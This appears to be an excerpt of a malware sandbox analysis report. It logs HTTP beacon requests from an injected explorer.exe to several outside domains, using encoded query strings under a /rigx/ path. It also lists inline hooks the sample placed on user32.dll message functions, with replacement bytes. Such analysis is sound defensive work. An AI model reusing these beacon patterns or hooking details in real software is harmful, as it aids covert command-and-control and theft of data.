                                • www.diofis.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.54978334.102.136.18080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Oct 28, 2021 07:41:15.005089998 CEST1470OUTGET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1
                                Host: www.lifeinformpodcast.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:15.191107988 CEST1471INHTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Thu, 28 Oct 2021 05:41:15 GMT
                                Content-Type: text/html
                                Content-Length: 275
                                ETag: "61797038-113"
                                Via: 1.1 google
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.549790159.65.10.14380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Oct 28, 2021 07:41:35.714570045 CEST6796OUTGET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1
                                Host: www.transforming-leadership.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:36.150578976 CEST6797INHTTP/1.1 404 Not Found
                                Date: Thu, 28 Oct 2021 05:41:35 GMT
                                Server: Apache
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"
                                Referrer-Policy: no-referrer-when-downgrade
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 39 37 65 33 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 37 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f
                                Data Ascii: 97e3<!DOCTYPE html><html class="no-js" lang="en-AU"><head> <meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="http://www.transforming-leadership.com/xmlrpc.php"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v17.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Transforming Leadership</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Transforming Leadership" /><meta property="og:site_name" content="Transforming Leadership" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.transforming-leadership.com/#website","url":"https://www.transforming-leadership.com/","name":"Transforming Leadership","description":"","potentialActio
                                Oct 28, 2021 07:41:36.150625944 CEST6799INData Raw: 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f
                                Data Ascii: n":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.transforming-leadership.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-AU"}]}</script>... / Yoast SEO p
                                Oct 28, 2021 07:41:36.150654078 CEST6800INData Raw: 73 2c 74 29 2c 30 2c 30 29 2c 65 3d 3d 3d 69 2e 74 6f 44 61 74 61 55 52 4c 28 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 74 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c
                                Data Ascii: s,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},
                                Oct 28, 2021 07:41:36.150681019 CEST6801INData Raw: 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f
                                Data Ascii: ge",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);</script><style type="text/css">im
                                Oct 28, 2021 07:41:36.150707006 CEST6803INData Raw: 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78
                                Data Ascii: ion{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bo
                                Oct 28, 2021 07:41:36.150736094 CEST6804INData Raw: 6c 65 2d 64 6f 74 73 29 7b 68 65 69 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 65 61 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 33 70 78 20 73 6f 6c 69 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20
                                Data Ascii: le-dots){height:2px}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{padding:.5em;border:1px solid;word-break:normal}.wp-block-table figcaption{color:#555;font-size:
                                Oct 28, 2021 07:41:36.150765896 CEST6805INData Raw: 65 72 2c 6c 69 2e 62 79 70 6f 73 74 61 75 74 68 6f 72 20 3e 20 61 72 74 69 63 6c 65 2e 63 6f 6d 6d 65 6e 74 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 31 39 30 61 32 3b 7d 2e 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 2d 6e 61 76 20 61 2c 2e
                                Data Ascii: er,li.bypostauthor > article.comment{border-color:#6190a2;}.flex-direction-nav a,.flex-control-nav a:hover,.flex-control-nav a.flex-active,.x-dropcap,.x-skill-bar .bar,.x-pricing-column.featured h2,.h-comments-title small,.x-pagination a:hover
                                Oct 28, 2021 07:41:36.150790930 CEST6807INData Raw: 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 32 35 2c 35 37 29 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 37 38 2e 39 38 70 78 29 7b 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d
                                Data Ascii: {background-color:rgb(0,25,57);}@media (max-width:978.98px){}html{font-size:16px;}@media (min-width:480px){html{font-size:16px;}}@media (min-width:767px){html{font-size:16px;}}@media (min-width:979px){html{font-size:16px;}}@media (min-width:12
                                Oct 28, 2021 07:41:36.150819063 CEST6808INData Raw: 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 63 66 63 2d 68 2d 62 64 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 32 35 2c 35 37 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 63 66 63 2d 68 2d 62 67 7b 62 61 63 6b 67 72 6f 75 6e 64
                                Data Ascii: ) !important;}.cfc-h-bd{border-color:rgb(0,25,57) !important;}.cfc-h-bg{background-color:rgb(0,25,57) !important;}.cfc-b-tx{color:#7c7c7c !important;}.cfc-b-bd{border-color:#7c7c7c !important;}.cfc-b-bg{background-color:#7c7c7c !important;}.x-
                                Oct 28, 2021 07:41:36.150846004 CEST6810INData Raw: 64 64 69 6e 67 2d 74 6f 70 3a 34 33 70 78 3b 7d 2e 78 2d 6e 61 76 62 61 72 20 2e 64 65 73 6b 74 6f 70 20 2e 78 2d 6e 61 76 20 3e 20 6c 69 20 3e 20 61 2c 2e 78 2d 6e 61 76 62 61 72 20 2e 64 65 73 6b 74 6f 70 20 2e 73 75 62 2d 6d 65 6e 75 20 6c 69
                                Data Ascii: dding-top:43px;}.x-navbar .desktop .x-nav > li > a,.x-navbar .desktop .sub-menu li > a,.x-navbar .mobile .x-nav li a{color:rgb(0,25,57);}.x-navbar .desktop .x-nav > li > a:hover,.x-navbar .desktop .x-nav > .x-active > a,.x-navbar .desktop .x-n
                                Oct 28, 2021 07:41:36.435035944 CEST6811INData Raw: 74 6f 6d 20 61 2c 2e 78 2d 63 6f 6c 6f 70 68 6f 6e 2e 62 6f 74 74 6f 6d 20 2e 78 2d 73 6f 63 69 61 6c 2d 67 6c 6f 62 61 6c 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 78 2d 6e 61 76 62 61 72 2d 69 6e 6e 65 72 7b 6d 69 6e 2d 68 65 69
                                Data Ascii: tom a,.x-colophon.bottom .x-social-global a{color:#ffffff;}.x-navbar-inner{min-height:100px;}.x-brand{margin-top:27px;font-family:inherit;font-size:18px;font-style:normal;font-weight:400;letter-spacing:5em;text-transform:uppercase;color:rgb(0,


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.549795109.232.217.5580C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Oct 28, 2021 07:41:56.621298075 CEST6859OUTGET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1
                                Host: www.diofis.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:56.921601057 CEST6860INHTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.24
                                content-type: text/html; charset=UTF-8
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache: miss
                                content-length: 33607
                                date: Thu, 28 Oct 2021 05:41:56 GMT
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 39 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6c 6f 67 6f 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 74 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 39 2f 63 72 6f 70 70 65 64 2d 64 69 6f
                                Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11">... This site is optimized with the Yoast SEO plugin v15.9.2 - https://yoast.com/wordpress/plugins/seo/ --><title>Sayfa bulunamad - diofis</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="tr_TR" /><meta property="og:title" content="Sayfa bulunamad - diofis" /><meta property="og:site_name" content="diofis" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://www.diofis.com/#organization","name":"Diofis Beslenme ve Diyet Ofisi","url":"http://www.diofis.com/","sameAs":[],"logo":{"@type":"ImageObject","@id":"http://www.diofis.com/#logo","inLanguage":"tr","url":"http://www.diofis.com/wp-content/uploads/2020/09/cropped-dio
                                Oct 28, 2021 07:41:56.921631098 CEST6861INData Raw: 66 69 73 2d 6c 6f 67 6f 2d 32 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 39 36 38 2c 22 68 65 69 67 68 74 22 3a 39 37 34 2c 22 63 61 70 74 69 6f 6e 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69
                                Data Ascii: fis-logo-2.png","width":968,"height":974,"caption":"Diofis Beslenme ve Diyet Ofisi"},"image":{"@id":"http://www.diofis.com/#logo"}},{"@type":"WebSite","@id":"http://www.diofis.com/#website","url":"http://www.diofis.com/","name":"diofis","descr
                                Oct 28, 2021 07:41:56.921644926 CEST6863INData Raw: 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73
                                Data Ascii: ","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.diofis.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.6"}};!function(e,a,t){var n,r,o,i=a.createEl
                                Oct 28, 2021 07:41:56.921662092 CEST6864INData Raw: 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74
                                Data Ascii: rts.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback
                                Oct 28, 2021 07:41:56.921678066 CEST6865INData Raw: 6c 65 20 69 64 3d 27 6e 65 76 65 2d 73 74 79 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2e 68 65 61 64 65 72 2d 6d 65 6e 75 2d 73 69 64 65 62 61 72 2d 69 6e 6e 65 72 20 6c 69 2e 6d 65 6e 75 2d
                                Data Ascii: le id='neve-style-inline-css' type='text/css'>.header-menu-sidebar-inner li.menu-item-nav-search { display: none; } .container{ max-width: 748px; } .has-neve-link-hover-color-color{ color: #0366d6!important; } .has-neve-link-color-color{ col
                                Oct 28, 2021 07:41:56.921694040 CEST6867INData Raw: 20 61 3a 68 6f 76 65 72 2c 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 70 72 69 6d 61 72 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 20 7b 20 62 61 63 6b 67 72 6f
                                Data Ascii: a:hover, .wp-block-button.is-style-primary .wp-block-button__link:hover { background-color: #0366d6;color: #ffffff; } .button.button-secondary, #comments input[type="submit"], #comments input[type=submit], .cart-off-canvas .button.nv-close-ca
                                Oct 28, 2021 07:41:56.921710014 CEST6868INData Raw: 2e 6e 76 2d 69 63 6f 6e 20 73 76 67 2c 2e 68 65 61 64 65 72 2d 6d 65 6e 75 2d 73 69 64 65 62 61 72 20 2e 68 65 61 64 65 72 2d 6d 65 6e 75 2d 73 69 64 65 62 61 72 2d 62 67 20 2e 6e 76 2d 63 6f 6e 74 61 63 74 2d 6c 69 73 74 20 73 76 67 7b 20 66 69
                                Data Ascii: .nv-icon svg,.header-menu-sidebar .header-menu-sidebar-bg .nv-contact-list svg{ fill: #404248; } .header-menu-sidebar .header-menu-sidebar-bg .icon-bar{ background-color: #404248; } .hfg_header .header-menu-sidebar .header-menu-sidebar-bg .nav
                                Oct 28, 2021 07:41:56.921726942 CEST6870INData Raw: 72 20 3e 20 61 2c 2e 62 75 69 6c 64 65 72 2d 69 74 65 6d 2d 2d 70 72 69 6d 61 72 79 2d 6d 65 6e 75 20 2e 6e 61 76 2d 6d 65 6e 75 2d 70 72 69 6d 61 72 79 20 3e 20 2e 6e 61 76 2d 75 6c 20 6c 69 3a 68 6f 76 65 72 20 3e 20 2e 68 61 73 2d 63 61 72 65
                                Data Ascii: r > a,.builder-item--primary-menu .nav-menu-primary > .nav-ul li:hover > .has-caret > a,.builder-item--primary-menu .nav-menu-primary > .nav-ul li:hover > .has-caret{ color: #f9c26d; } .builder-item--primary-menu .nav-menu-primary > .nav-ul li
                                Oct 28, 2021 07:41:56.921742916 CEST6871INData Raw: 6f 74 74 6f 6d 2d 69 6e 6e 65 72 20 61 3a 6e 6f 74 28 2e 62 75 74 74 6f 6e 29 2c 2e 66 6f 6f 74 65 72 2d 62 6f 74 74 6f 6d 2d 69 6e 6e 65 72 20 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 7b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 7d 20
                                Data Ascii: ottom-inner a:not(.button),.footer-bottom-inner .navbar-toggle{ color: #ffffff; } .footer-bottom-inner .nv-icon svg,.footer-bottom-inner .nv-contact-list svg{ fill: #ffffff; } .footer-bottom-inner .icon-bar{ background-color: #ffffff; } .foote
                                Oct 28, 2021 07:41:56.921758890 CEST6872INData Raw: 31 2e 36 65 6d 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 6d 61 72 67 69 6e 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 20 7d 20 2e 62 75 69
                                Data Ascii: 1.6em; letter-spacing: 0px; padding:0px 0px 0px 0px;margin:0px 0px 0px 0px; } .builder-item--primary-menu svg{ width: 1em;height: 1em; } .builder-item--footer_copyright{ font-size: 1em; line-height: 1.6em; letter-spacing: 0px; padding:0px 0px
                                Oct 28, 2021 07:41:56.976444960 CEST6874INData Raw: 3a 2d 31 30 70 78 20 7d 20 2e 62 75 69 6c 64 65 72 2d 69 74 65 6d 2d 2d 70 72 69 6d 61 72 79 2d 6d 65 6e 75 20 2e 73 74 79 6c 65 2d 66 75 6c 6c 2d 68 65 69 67 68 74 20 2e 6e 61 76 2d 75 6c 20 6c 69 3a 6e 6f 74 28 2e 6d 65 6e 75 2d 69 74 65 6d 2d
                                Data Ascii: :-10px } .builder-item--primary-menu .style-full-height .nav-ul li:not(.menu-item-nav-search):not(.menu-item-nav-cart):hover > a:after{ width: calc(100% + 20px); } .builder-item--primary-menu .nav-ul li a, .builder-item--primary-menu .neve-mm-


                                Code Manipulations

                                User Modules

                                Hook Summary

                                Function NameHook TypeActive in Processes
                                PeekMessageAINLINEexplorer.exe
                                PeekMessageWINLINEexplorer.exe
                                GetMessageWINLINEexplorer.exe
                                GetMessageAINLINEexplorer.exe

                                Processes

                                Process: explorer.exe, Module: user32.dll
                                Function NameHook TypeNew Data
                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEA
                                PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEA
                                GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEA
